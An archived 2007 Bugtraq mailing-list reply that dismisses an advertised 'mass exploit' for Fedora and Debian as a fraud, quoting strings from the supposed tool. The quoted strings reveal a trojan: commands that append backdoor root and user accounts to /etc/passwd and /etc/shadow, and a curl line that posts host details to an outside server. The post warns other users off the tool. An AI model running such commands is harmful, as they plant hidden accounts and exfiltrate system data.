lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.61.0708281123270.30395@soloth.lewis.org>
Date: Tue, 28 Aug 2007 11:24:15 -0400 (EDT)
From: Jon Lewis <jlewis@...is.org>
To: linux0day@...oo.co.uk
Cc: bugtraq@...urityfocus.com
Subject: Re: Found nice mass exploits for fedora and imap

On Mon, 28 Aug 2007 linux0day@...oo.co.uk wrote:

> Hello bugtraq,
> Did somebody realize a new mass exploits is realeased to public, it's seems work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap.
>
> I've found this link somedays ago in a security forum, check this out
>
> http://rufy.com/images/mass/

Looks like a fraud to me.  Nice try.

^M^@...he^@...P4rev1^@^@^@^@...t priviledge is needed - use your root user 
OK!
^@r^@...get.txt^@^@^@^@...ame your target list filename to 
target.txt^@...c/shadow^@^@...bie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/^@^@^@...o 
toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@^@^@...o 
newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@...o 
toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd^@^@^@^@...o 
newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> 
/etc/passwd^@...r/bin/curl^@^@^@^@...r/bin/curl -d 
"user=newbie&pass=novice&target=$(ifconfig -a)" 
http://www.trancefix.org/hell/save.php > /dev/null 
2&>/dev/null^@^@^@^@...ing to connect to %s port %d



----------------------------------------------------------------------
  Jon Lewis                   |  I route
  Senior Network Engineer     |  therefore you are
  Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ